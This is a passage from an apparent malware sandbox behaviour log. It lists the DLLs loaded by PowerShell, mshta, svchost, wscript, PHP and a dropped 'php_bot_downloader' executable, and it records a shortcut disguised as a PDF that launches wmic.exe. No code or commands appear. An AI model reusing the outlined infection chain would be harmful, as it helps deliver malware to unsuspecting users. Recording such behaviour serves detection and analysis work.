        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: imgutil.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: wininet.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: windows.storage.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: wldp.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: iertutil.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: profapi.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: kernel.appcore.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: ondemandconnroutehelper.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: winhttp.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: mswsock.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: winnsi.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: urlmon.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: srvcli.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: netutils.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: fwpuclnt.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: uxtheme.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: propsys.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: edputil.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: wintypes.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: appresolver.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: bcp47langs.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: slc.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: userenv.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: sppc.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: onecorecommonproxystub.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: onecoreuapcommonproxystub.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: pcacli.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: mpr.dll
        Source: C:\Users\user\AppData\Roaming\php_bot_downloader_v2-AVERAGE-BOI-CLN.exeSection loaded: sfc_os.dll
        Source: C:\Windows\System32\tar.exeSection loaded: archiveint.dll
        Source: C:\Windows\System32\tar.exeSection loaded: cryptsp.dll
        Source: C:\Windows\System32\tar.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: php8ts.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: vcruntime140.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: vcruntime140.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: sspicli.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: napinsp.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: pnrpnsp.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: wshbth.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: nlaapi.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: mswsock.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: winrnr.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exeSection loaded: fwpuclnt.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe Section loaded: php8ts.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe Section loaded: vcruntime140.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe Section loaded: iphlpapi.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe Section loaded: dnsapi.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe Section loaded: mswsock.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe Section loaded: rasadhlp.dll
        Source: C:\Users\user\AppData\Roaming\php-8.2.11-Win32-vs16-x64\php.exe Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
        Source: HateSpeech2024_Summary.pdf.lnk.bin.lnk LNK file: ..\..\..\Windows\System32\Wbem\wmic.exe
